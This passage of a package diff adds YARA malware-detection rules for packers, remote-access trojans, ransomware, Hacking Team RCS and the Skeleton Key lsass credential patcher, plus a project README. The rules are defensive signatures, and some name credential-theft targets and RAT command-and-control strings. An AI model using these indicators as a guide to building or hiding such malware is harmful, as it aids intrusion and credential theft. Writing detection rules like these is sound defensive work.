+
+	strings:
+		$str1={E8 24 00 00 00 8B 4C 24 0C C7 01 17 00 01 00 C7 81 B8 00 00 00 00 00 00 00 31 C0 89 41 14 89 41 18 80 A1 C1 00 00 00 FE C3 31 C0 64 FF 30 64 89 20 64 8F 05 00 00 00 00} /*EntryPoint*/
+		
+	condition:
+		$str1 at pe.entry_point
+}
+
+rule winrar_sfx : Packer
+{
+	meta:
+		author="Kevin Falcoz"
+		date_create="18/03/2013"
+		description="Winrar SFX Archive"
+	
+	strings:
+		$signature1={00 00 53 6F 66 74 77 61 72 65 5C 57 69 6E 52 41 52 20 53 46 58 00} 
+		
+	condition:
+		$signature1
+}
+
+rule mpress_2_xx_x86 : Packer
+{
+	meta:
+		author="Kevin Falcoz"
+		date_create="19/03/2013"
+		last_edit="24/03/2013"
+		description="MPRESS v2.XX x86  - no .NET"
+	
+	strings:
+		$signature1={60 E8 00 00 00 00 58 05 [2] 00 00 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 50 AD 2B C8 03 F1 8B C8 57 51 49 8A 44 39 06 88 04 31 75 F6}
+		
+	condition:
+		$signature1 at pe.entry_point
+}
+
+rule mpress_2_xx_x64 : Packer
+{
+	meta:
+		author="Kevin Falcoz"
+		date_create="19/03/2013"
+		last_edit="24/03/2013"
+		description="MPRESS v2.XX x64  - no .NET"
+	
+	strings:
+		$signature1={57 56 53 51 52 41 50 48 8D 05 DE 0A 00 00 48 8B 30 48 03 F0 48 2B C0 48 8B FE 66 AD C1 E0 0C 48 8B C8 50 AD 2B C8 48 03 F1 8B C8 57 44 8B C1 FF C9 8A 44 39 06 88 04 31} 
+		
+	condition:
+		$signature1 at pe.entry_point
+}
+
+rule mpress_2_xx_net : Packer
+{
+	meta:
+		author="Kevin Falcoz"
+		date_create="24/03/2013"
+		description="MPRESS v2.XX .NET"
+	
+	strings:
+		$signature1={21 46 00 69 00 6C 00 65 00 20 00 69 00 73 00 20 00 69 00 6E 00 76 00 61 00 6C 00 69 00 64 00 2E 00 00 0D 4D 00 50 00 52 00 45 00 53 00 53 00 00 00 00 00 2D 2D 93 6B 35 04 2E 43 85 EF}
+		
+	condition:
+		$signature1
+}
+
+rule rpx_1_xx : Packer
+{
+	meta:
+		author="Kevin Falcoz"
+		date_create="24/03/2013"
+		description="RPX v1.XX"
+	
+	strings:
+		$signature1= "RPX 1."
+		$signature2= "Copyright ©  20"
+		
+	condition:
+		$signature1 and $signature2
+}
+
+rule mew_11_xx : Packer
+{
+	meta:
+		author="Kevin Falcoz"
+		date_create="25/03/2013"
+		description="MEW 11"
+	
+	strings:
+		$signature1={50 72 6F 63 41 64 64 72 65 73 73 00 E9 [6-7] 00 00 00 00 00 00 00 00 00 [7] 00}
+		$signature2="MEW"
+		
+	condition:
+		$signature1 and $signature2
+}
+
+rule yoda_crypter_1_2 : Crypter
+{
+	meta:
+		author="Kevin Falcoz"
+		date_create="15/04/2013"
+		description="Yoda Crypter 1.2"
+	
+	strings:
+		$signature1={60 E8 00 00 00 00 5D 81 ED F3 1D 40 00 B9 7B 09 00 00 8D BD 3B 1E 40 00 8B F7 AC [19] EB 01 [27] AA E2 CC}
+		
+	condition:
+		$signature1 at pe.entry_point
+}
+
+rule yoda_crypter_1_3 : Crypter
+{
+	meta:
+		author="Kevin Falcoz"
+		date_create="15/04/2013"
+		description="Yoda Crypter 1.3"
+	
+	strings:
+		$signature1={55 8B EC 53 56 57 60 E8 00 00 00 00 5D 81 ED 6C 28 40 00 B9 5D 34 40 00 81 E9 C6 28 40 00 8B D5 81 C2 C6 28 40 00 8D 3A 8B F7 33 C0 EB 04 90 EB 01 C2 AC}
+		
+	condition:
+		$signature1 at pe.entry_point
+}
diff -Nru remnux-rules-0.0.3/yara.old/PlugX.yara remnux-rules-0.0.4/yara.old/PlugX.yara
--- remnux-rules-0.0.3/yara.old/PlugX.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/PlugX.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,47 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule PlugXStrings : PlugX Family
+{
+    meta:
+        description = "PlugX Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-12"
+        
+    strings:
+        $BootLDR = "boot.ldr" wide ascii
+        $Dwork = "d:\\work" nocase
+        $Plug25 = "plug2.5"
+        $Plug30 = "Plug3.0"
+        $Shell6 = "Shell6"
+      
+    condition:
+        $BootLDR or ($Dwork and ($Plug25 or $Plug30 or $Shell6))
+}
+
+rule plugX : rat
+{
+	meta:
+		author = "Jean-Philippe Teissier / @Jipe_"
+		description = "PlugX RAT"
+		date = "2014-05-13"
+		filetype = "memory"
+		version = "1.0" 
+		ref1 = "https://github.com/mattulm/IR-things/blob/master/volplugs/plugx.py"
+		
+	strings:
+		$v1a = { 47 55 4C 50 00 00 00 00 }
+		$v1b = "/update?id=%8.8x" 
+		$v1algoa = { BB 33 33 33 33 2B } 
+		$v1algob = { BB 44 44 44 44 2B } 
+		$v2a = "Proxy-Auth:" 
+		$v2b = { 68 A0 02 00 00 } 
+		$v2k = { C1 8F 3A 71 } 
+		
+	condition: 
+		$v1a at 0 or $v1b or (($v2a or $v2b) and (($v1algoa and $v1algob) or $v2k))
+}
diff -Nru remnux-rules-0.0.3/yara.old/PoisonIvy.yara remnux-rules-0.0.4/yara.old/PoisonIvy.yara
--- remnux-rules-0.0.3/yara.old/PoisonIvy.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/PoisonIvy.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,24 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule poisonivy : rat
+{
+	meta:
+		description = "Poison Ivy"
+		author = "Jean-Philippe Teissier / @Jipe_"
+		date = "2013-02-01"
+		filetype = "memory"
+		version = "1.0" 
+		ref1 = "https://code.google.com/p/volatility/source/browse/trunk/contrib/plugins/malware/poisonivy.py"
+
+	strings:
+		$a = { 53 74 75 62 50 61 74 68 ?? 53 4F 46 54 57 41 52 45 5C 43 6C 61 73 73 65 73 5C 68 74 74 70 5C 73 68 65 6C 6C 5C 6F 70 65 6E 5C 63 6F 6D 6D 61 6E 64 [22] 53 6F 66 74 77 61 72 65 5C 4D 69 63 72 6F 73 6F 66 74 5C 41 63 74 69 76 65 20 53 65 74 75 70 5C 49 6E 73 74 61 6C 6C 65 64 20 43 6F 6D 70 6F 6E 65 6E 74 73 5C } 
+		
+	condition:
+		$a
+}
+
diff -Nru remnux-rules-0.0.3/yara.old/PubSab.yara remnux-rules-0.0.4/yara.old/PubSab.yara
--- remnux-rules-0.0.3/yara.old/PubSab.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/PubSab.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,47 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule PubSabCode : PubSab Family 
+{
+    meta:
+        description = "PubSab code tricks"
+        author = "Seth Hardy"
+        last_modified = "2014-06-19"
+        
+    strings:
+        $decrypt = { 6B 45 E4 37 89 CA 29 C2 89 55 E4 }
+        
+    condition:
+        any of them
+}
+
+rule PubSabStrings : PubSab Family
+{
+    meta:
+        description = "PubSab Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-19"
+        
+    strings:
+        $ = "_deamon_init"
+        $ = "com.apple.PubSabAgent"
+        $ = "/tmp/screen.jpeg"
+       
+    condition:
+        any of them
+}
+
+rule PubSab : Family
+{
+    meta:
+        description = "PubSab"
+        author = "Seth Hardy"
+        last_modified = "2014-06-19"
+        
+    condition:
+        PubSabCode or PubSabStrings
+}
diff -Nru remnux-rules-0.0.3/yara.old/Quarian.yara remnux-rules-0.0.4/yara.old/Quarian.yara
--- remnux-rules-0.0.3/yara.old/Quarian.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Quarian.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,75 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule QuarianStrings : Quarian Family
+{
+    meta:
+        description = "Quarian Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-07-09"
+        
+    strings:
+        $ = "s061779s061750"
+        $ = "[OnUpLoadFile]"
+        $ = "[OnDownLoadFile]"
+        $ = "[FileTransfer]"
+        $ = "---- Not connect the Manager, so start UnInstall ----"
+        $ = "------- Enter CompressDownLoadDir ---------"
+        $ = "------- Enter DownLoadDirectory ---------"
+        $ = "[HandleAdditionalData]"
+        $ = "[mswsocket.dll]"
+        $ = "msupdate.dll........Enter ThreadCmd!"
+        $ = "ok1-1"
+        $ = "msupdate_tmp.dll"
+        $ = "replace Rpcss.dll successfully!"
+        $ = "f:\\loadhiddendriver-mdl\\objfre_win7_x86\\i386\\intelnat.pdb"
+        $ = "\\drivercashe\\" wide ascii
+        $ = "\\microsoft\\windwos\\" wide ascii
+        $ = "\\DosDevices\\LOADHIDDENDRIVER" wide ascii
+        $ = "\\Device\\LOADHIDDENDRIVER" wide ascii
+        $ = "Global\\state_maping" wide ascii
+        $ = "E:\\Code\\2.0\\2.0_multi-port\\2.0\\ServerInstall_New-2010-0913_sp3\\msupdataDll\\Release\\msupdate_tmp.pdb"
+        $ = "Global\\unInstall_event_1554_Ower" wide ascii
+        
+    condition:
+       any of them
+}
+
+rule QuarianCode : Quarian Family 
+{
+    meta:
+        description = "Quarian code features"
+        author = "Seth Hardy"
+        last_modified = "2014-07-09"
+    
+    strings:
+        // decrypt in intelnat.sys
+        $ = { C1 E? 04 8B ?? F? C1 E? 05 33 C? }
+        // decrypt in mswsocket.dll
+        $ = { C1 EF 05 C1 E3 04 33 FB }
+        $ = { 33 D8 81 EE 47 86 C8 61 }
+        // loop in msupdate.dll
+        $ = { FF 45 E8 81 45 EC CC 00 00 00 E9 95 FE FF FF }
+    
+    condition:
+        any of them
+}
+
+rule Quarian : Family
+{
+    meta:
+        description = "Quarian"
+        author = "Seth Hardy"
+        last_modified = "2014-07-09"
+        
+    condition:
+        QuarianCode or QuarianStrings
+}
+
+
+
+
diff -Nru remnux-rules-0.0.3/yara.old/Ramsonware.yara remnux-rules-0.0.4/yara.old/Ramsonware.yara
--- remnux-rules-0.0.3/yara.old/Ramsonware.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Ramsonware.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,65 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule CryptoLocker_set1
+{
+meta:
+	author = "Christiaan Beek, Christiaan_Beek@McAfee.com"
+	date = "2014-04-13"
+	description = "Detection of Cryptolocker Samples"
+	
+strings:
+	$string0 = "static"
+	$string1 = " kscdS"
+	$string2 = "Romantic"
+	$string3 = "CompanyName" wide
+	$string4 = "ProductVersion" wide
+	$string5 = "9%9R9f9q9"
+	$string6 = "IDR_VERSION1" wide
+	$string7 = "  </trustInfo>"
+	$string8 = "LookFor" wide
+	$string9 = ":n;t;y;"
+	$string10 = "        <requestedExecutionLevel level"
+	$string11 = "VS_VERSION_INFO" wide
+	$string12 = "2.0.1.0" wide
+	$string13 = "<assembly xmlns"
+	$string14 = "  <trustInfo xmlns"
+	$string15 = "srtWd@@"
+	$string16 = "515]5z5"
+	$string17 = "C:\\lZbvnoVe.exe" wide
+condition:
+	8 of ($string*)
+}
+
+rule CryptoLocker_rule2
+{
+meta:
+	author = "Christiaan Beek, Christiaan_Beek@McAfee.com"
+	date = "2014-04-14"
+	description = "Detection of CryptoLocker Variants"
+strings:
+	$string0 = "2.0.1.7" wide
+	$string1 = "    <security>"
+	$string2 = "Romantic"
+	$string3 = "ProductVersion" wide
+	$string4 = "9%9R9f9q9"
+	$string5 = "IDR_VERSION1" wide
+	$string6 = "button"
+	$string7 = "    </security>"
+	$string8 = "VFileInfo" wide
+	$string9 = "LookFor" wide
+	$string10 = "      </requestedPrivileges>"
+	$string11 = " uiAccess"
+	$string12 = "  <trustInfo xmlns"
+	$string13 = "last.inf"
+	$string14 = " manifestVersion"
+	$string15 = "FFFF04E3" wide
+	$string16 = "3,31363H3P3m3u3z3"
+condition:
+	8 of ($string*)
+}
+
diff -Nru remnux-rules-0.0.3/yara.old/RAT_Terminator.yara remnux-rules-0.0.4/yara.old/RAT_Terminator.yara
--- remnux-rules-0.0.3/yara.old/RAT_Terminator.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/RAT_Terminator.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,40 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+rule TerminatorRat : rat 
+{
+	meta:
+		description = "Terminator RAT" 
+		author = "Jean-Philippe Teissier / @Jipe_"
+		date = "2013-10-24"
+		filetype = "memory"
+		version = "1.0" 
+		ref1 = "http://www.fireeye.com/blog/technical/malware-research/2013/10/evasive-tactics-terminator-rat.html" 
+
+	strings:
+		$a = "Accelorator"
+		$b = "<html><title>12356</title><body>"
+
+	condition:
+		all of them
+}
+
+
+
+rule TROJAN_Notepad_shell_crew {
+        meta:
+                author = "RSA_IR"
+                Date     = "4Jun13"
+                File     = "notepad.exe v 1.1"
+                MD5      = "106E63DBDA3A76BEEB53A8BBD8F98927"
+        strings:
+                $s1 = "75BAA77C842BE168B0F66C42C7885997"
+                $s2 = "B523F63566F407F3834BCC54AAA32524"
+        condition:
+                $s1 or $s2
+}
diff -Nru remnux-rules-0.0.3/yara.old/RCS.yara remnux-rules-0.0.4/yara.old/RCS.yara
--- remnux-rules-0.0.3/yara.old/RCS.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/RCS.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,73 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule RCS_Backdoor
+{
+    meta:
+        description = "Hacking Team RCS Backdoor"
+	author = "botherder https://github.com/botherder"
+
+    strings:
+        $filter1 = "$debug3"
+        $filter2 = "$log2"
+        $filter3 = "error2"
+
+        $debug1 = /\- (C)hecking components/ wide ascii
+        $debug2 = /\- (A)ctivating hiding system/ wide ascii
+        $debug3 = /(f)ully operational/ wide ascii
+
+        $log1 = /\- Browser activity \(FF\)/ wide ascii
+        $log2 = /\- Browser activity \(IE\)/ wide ascii
+        
+        // Cause false positives.
+        //$log3 = /\- About to call init routine at %p/ wide ascii
+        //$log4 = /\- Calling init routine at %p/ wide ascii
+
+        $error1 = /\[Unable to deploy\]/ wide ascii
+        $error2 = /\[The system is already monitored\]/ wide ascii
+
+    condition:
+        (2 of ($debug*) or 2 of ($log*) or all of ($error*)) and not any of ($filter*)
+}
+
+rule RCS_Scout
+{
+    meta:
+        description = "Hacking Team RCS Scout"
+	author = "botherder https://github.com/botherder"
+
+    strings:
+        $filter1 = "$engine5"
+        $filter2 = "$start4"
+        $filter3 = "$upd2"
+        $filter4 = "$lookma6"
+
+        $engine1 = /(E)ngine started/ wide ascii
+        $engine2 = /(R)unning in background/ wide ascii
+        $engine3 = /(L)ocking doors/ wide ascii
+        $engine4 = /(R)otors engaged/ wide ascii
+        $engine5 = /(I)\'m going to start it/ wide ascii
+
+        $start1 = /Starting upgrade\!/ wide ascii
+        $start2 = /(I)\'m going to start the program/ wide ascii
+        $start3 = /(i)s it ok\?/ wide ascii
+        $start4 = /(C)lick to start the program/ wide ascii
+
+        $upd1 = /(U)pdJob/ wide ascii
+        $upd2 = /(U)pdTimer/ wide ascii
+
+        $lookma1 = /(O)wning PCI bus/ wide
+        $lookma2 = /(F)ormatting bios/ wide
+        $lookma3 = /(P)lease insert a disk in drive A:/ wide
+        $lookma4 = /(U)pdating CPU microcode/ wide
+        $lookma5 = /(N)ot sure what's happening/ wide
+        $lookma6 = /(L)ook ma, no thread id\! \\\\o\// wide        
+
+    condition:
+        (all of ($engine*) or all of ($start*) or all of ($upd*) or 4 of ($lookma*)) and not any of ($filter*)
+}
+
diff -Nru remnux-rules-0.0.3/yara.old/README.capabilities remnux-rules-0.0.4/yara.old/README.capabilities
--- remnux-rules-0.0.3/yara.old/README.capabilities	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/README.capabilities	2015-05-08 13:27:55.000000000 +0000
@@ -0,0 +1,3 @@
+The capabilities.yara file is from the Malware Analyst's Cookbook book at https://malwarecookbook.googlecode.com/svn/trunk/3/5/capabilities.yara
+
+The file is distributed for free, but the exact license is unknow. It is most likely copyright by authors of the Malware Analyst's Cookbook book: Michael Ligh, Steven Adair, Blake Hartstein.
diff -Nru remnux-rules-0.0.3/yara.old/README.md remnux-rules-0.0.4/yara.old/README.md
--- remnux-rules-0.0.3/yara.old/README.md	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/README.md	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,53 @@
+# Project
+
+This project covers the need of a group of IT Security Researches to have a single repository where different Yara signatures are compiled, classified and kept as up to date as possible, and begin as an open source community for collecting Yara rules. Our Yara ruleset is under the GNU-GPLv2 license and open to any user or organization, as long as you use it under this license.
+
+Yara is being increasingly used, but knowledge about the tool and its usage is dispersed in many different places. Yara Rules project aims to be the meeting point for Yara users, gathering together a ruleset as complete as possible thus providing users a quick way to get Yara ready for usage.
+
+We hope this project is useful for the Security Community and all Yara Users, and are looking forward to your feedback. Join this community by subscribing to our mailing list.
+
+# Contribute
+
+If you’re interested in sharing your Yara rules with us and the Security Community, you can join our mailing list, send a message to our Twitter account or send a pull request here.
+
+Twitter account: https://twitter.com/yararules
+
+Mail list : http://list.yararules.com/mailman/listinfo/yararules.com.signatures
+
+# Requirements
+
+Yara **version 3.0** or higher is required for most of the rules to work. This is mainly due to the use of the "pe" module introduced in that version.
+
+You can check your installed version with `yara -v`
+
+The available packages in Ubuntu 14.04 LTS default repositories are too old.  You can install from source or use the packages available in the [Remnux repository](https://launchpad.net/~remnux/+archive/ubuntu/stable).
+
+# Categories
+
+## Antidebug/AntiVM
+
+In this section you will find Yara Rules aimed to detect anti debug and anti virtualization techniques used by malware to evade automated analyisis.
+
+## Crypto
+
+In this section you will find Yara rules aimed to detect the existence of cryptographic algoritms.
+
+## Malicious Documents
+
+In this section you will find Yara Rules to be used with documents to find if they have been crafted to leverage malicious code.
+
+## Malware 
+
+In this section you will find Yara rules specialised on the indentification of well-known malware.
+
+## Packers
+
+In this section you will find Yara Rules aimed to detect well-known sofware packers, that can be used by malware to hide itself.
+
+# Contact 
+
+Webpage: http://yararules.com
+
+Twitter account: https://twitter.com/yararules
+
+Mail list : http://list.yararules.com/mailman/listinfo/yararules.com.signatures
diff -Nru remnux-rules-0.0.3/yara.old/Regsubdat.yara remnux-rules-0.0.4/yara.old/Regsubdat.yara
--- remnux-rules-0.0.3/yara.old/Regsubdat.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Regsubdat.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,54 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule RegSubDatCode : RegSubDat Family 
+{
+    meta:
+        description = "RegSubDat code features"
+        author = "Seth Hardy"
+        last_modified = "2014-07-14"
+    
+    strings:
+        // decryption loop
+        $ = { 80 34 3? 99 40 (3D FB 65 00 00 | 3B C6) 7? F? }
+        // push then pop values
+        $ = { 68 FF FF 7F 00 5? }
+        $ = { 68 FF 7F 00 00 5? }
+    
+    condition:
+        all of them
+}
+
+rule RegSubDatStrings : RegSubDat Family
+{
+    meta:
+        description = "RegSubDat Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-07-14"
+        
+    strings:
+        $avg1 = "Button"
+        $avg2 = "Allow"
+        $avg3 = "Identity Protection"
+        $avg4 = "Allow for all"
+        $avg5 = "AVG Firewall Asks For Confirmation"
+        $mutex = "0x1A7B4C9F"
+        
+    condition:
+       all of ($avg*) or $mutex
+}
+
+rule RegSubDat : Family
+{
+    meta:
+        description = "RegSubDat"
+        author = "Seth Hardy"
+        last_modified = "2014-07-14"
+        
+    condition:
+        RegSubDatCode or RegSubDatStrings
+}
diff -Nru remnux-rules-0.0.3/yara.old/Safenet.yara remnux-rules-0.0.4/yara.old/Safenet.yara
--- remnux-rules-0.0.3/yara.old/Safenet.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Safenet.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,50 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule SafeNetCode : SafeNet Family 
+{
+    meta:
+        description = "SafeNet code features"
+        author = "Seth Hardy"
+        last_modified = "2014-07-16"
+        
+    strings:
+        // add edi, 14h; cmp edi, 50D0F8h
+        $ = { 83 C7 14 81 FF F8 D0 40 00 }
+    condition:
+        any of them
+}
+
+rule SafeNetStrings : SafeNet Family
+{
+    meta:
+        description = "Strings used by SafeNet"
+        author = "Seth Hardy"
+        last_modified = "2014-07-16"
+        
+    strings:
+        $ = "6dNfg8Upn5fBzGgj8licQHblQvLnUY19z5zcNKNFdsDhUzuI8otEsBODrzFCqCKr"
+        $ = "/safe/record.php"
+        $ = "_Rm.bat" wide ascii
+        $ = "try\x0d\x0a\x09\x09\x09\x09  del %s" wide ascii
+        $ = "Ext.org" wide ascii
+        
+    condition:
+        any of them
+
+}
+
+rule SafeNet : Family
+{
+    meta:
+        description = "SafeNet family"
+        
+    condition:
+        SafeNetCode or SafeNetStrings
+        
+}
+
diff -Nru remnux-rules-0.0.3/yara.old/Scarhikn.yara remnux-rules-0.0.4/yara.old/Scarhikn.yara
--- remnux-rules-0.0.3/yara.old/Scarhikn.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Scarhikn.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,57 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule ScarhiknStrings : Scarhikn Family
+{
+    meta:
+        description = "Scarhikn Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+        
+    strings:
+        $ = "9887___skej3sd"
+        $ = "haha123"
+        
+    condition:
+       any of them
+}
+
+
+
+rule ScarhiknCode : Scarhikn Family 
+{
+    meta:
+        description = "Scarhikn code features"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+    
+    strings:
+        // decryption
+        $ = { 8B 06 8A 8B ?? ?? ?? ?? 30 0C 38 03 C7 55 43 E8 ?? ?? ?? ?? 3B D8 59 72 E7 }
+        $ = { 8B 02 8A 8D ?? ?? ?? ?? 30 0C 30 03 C6 8B FB 83 C9 FF 33 C0 45 F2 AE F7 D1 49 3B E9 72 E2 }
+    
+    condition:
+        any of them
+}
+
+rule Scarhikn : Family
+{
+    meta:
+        description = "Scarhikn"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+        
+    condition:
+        ScarhiknCode or ScarhiknStrings
+}
+
+
+
+
+
+
+
diff -Nru remnux-rules-0.0.3/yara.old/Scieron.yara remnux-rules-0.0.4/yara.old/Scieron.yara
--- remnux-rules-0.0.3/yara.old/Scieron.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Scieron.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,34 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Scieron
+{
+    meta:
+        author = "Symantec Security Response"
+        ref = "http://www.symantec.com/connect/tr/blogs/scarab-attackers-took-aim-select-russian-targets-2012"
+        date = "22.01.15"
+
+    strings:
+        // .text:10002069 66 83 F8 2C                       cmp     ax, ','
+        // .text:1000206D 74 0C                             jz      short loc_1000207B
+        // .text:1000206F 66 83 F8 3B                       cmp     ax, ';'
+        // .text:10002073 74 06                             jz      short loc_1000207B
+        // .text:10002075 66 83 F8 7C                       cmp     ax, '|'
+        // .text:10002079 75 05                             jnz     short loc_10002080
+        $code1 = {66 83 F? 2C 74 0C 66 83 F? 3B 74 06 66 83 F? 7C 75 05}
+        
+        // .text:10001D83 83 F8 09                          cmp     eax, 9          ; switch 10 cases
+        // .text:10001D86 0F 87 DB 00 00 00                 ja      loc_10001E67    ; jumptable 10001D8C default case
+        // .text:10001D8C FF 24 85 55 1F 00+                jmp     ds:off_10001F55[eax*4] ; switch jump
+        $code2 = {83 F? 09 0F 87 ?? 0? 00 00 FF 24}
+        
+        $str1  = "IP_PADDING_DATA" wide ascii
+        $str2  = "PORT_NUM" wide ascii
+        
+    condition:
+        all of them
+}
diff -Nru remnux-rules-0.0.3/yara.old/ShadowTech.yara remnux-rules-0.0.4/yara.old/ShadowTech.yara
--- remnux-rules-0.0.3/yara.old/ShadowTech.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/ShadowTech.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,23 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule ShadowTech
+{
+    meta:
+        description = "ShadowTech RAT"
+	author = "botherder https://github.com/botherder"
+
+    strings:
+        $string1 = /\#(S)trings/
+        $string2 = /\#(G)UID/
+        $string3 = /\#(B)lob/
+        $string4 = /(S)hadowTech Rat\.exe/
+        $string5 = /(S)hadowTech_Rat/
+
+    condition:
+        all of them
+}
diff -Nru remnux-rules-0.0.3/yara.old/Shamoon.yara remnux-rules-0.0.4/yara.old/Shamoon.yara
--- remnux-rules-0.0.3/yara.old/Shamoon.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Shamoon.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,20 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+rule CrowdStrike_Shamoon_DroppedFile { 
+	meta:
+		description = "Rule to detect Shamoon malware http://goo.gl/QTxohN"
+		reference = "http://www.rsaconference.com/writable/presentations/file_upload/exp-w01-hacking-exposed-day-of-destruction.pdf"
+	strings:
+		$testn123 = "test123" wide
+		$testn456 = "test456" wide
+		$testn789 = "test789" wide
+		$testdomain = "testdomain.com" wide $pingcmd = "ping -n 30 127.0.0.1 >nul" wide
+	condition:
+		(any of ($testn*) or $pingcmd) and $testdomain
+}
diff -Nru remnux-rules-0.0.3/yara.old/Skeleton.yara remnux-rules-0.0.4/yara.old/Skeleton.yara
--- remnux-rules-0.0.3/yara.old/Skeleton.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Skeleton.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,49 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule skeleton_key_patcher
+{
+	meta:
+		description = "Skeleton Key Patcher from Dell SecureWorks Report http://goo.gl/aAk3lN"
+		author = "Dell SecureWorks Counter Threat Unit"
+		reference = "http://goo.gl/aAk3lN"
+		date = "2015/01/13"
+		score = 70
+	strings:
+		$target_process = "lsass.exe" wide
+		$dll1 = "cryptdll.dll"
+		$dll2 = "samsrv.dll"
+
+		$name = "HookDC.dll"
+
+		$patched1 = "CDLocateCSystem"
+		$patched2 = "SamIRetrievePrimaryCredentials"
+		$patched3 = "SamIRetrieveMultiplePrimaryCredentials"
+	condition:
+		all of them
+}
+
+rule skeleton_key_injected_code
+{
+	meta:
+		description = "Skeleton Key injected Code http://goo.gl/aAk3lN"
+		author = "Dell SecureWorks Counter Threat Unit"
+		reference = "http://goo.gl/aAk3lN"
+		date = "2015/01/13"
+		score = 70
+	strings:
+		$injected = { 33 C0 85 C9 0F 95 C0 48 8B 8C 24 40 01 00 00 48 33 CC E8 4D 02 00 00 48 81 C4 58 01 00 00 C3 }
+
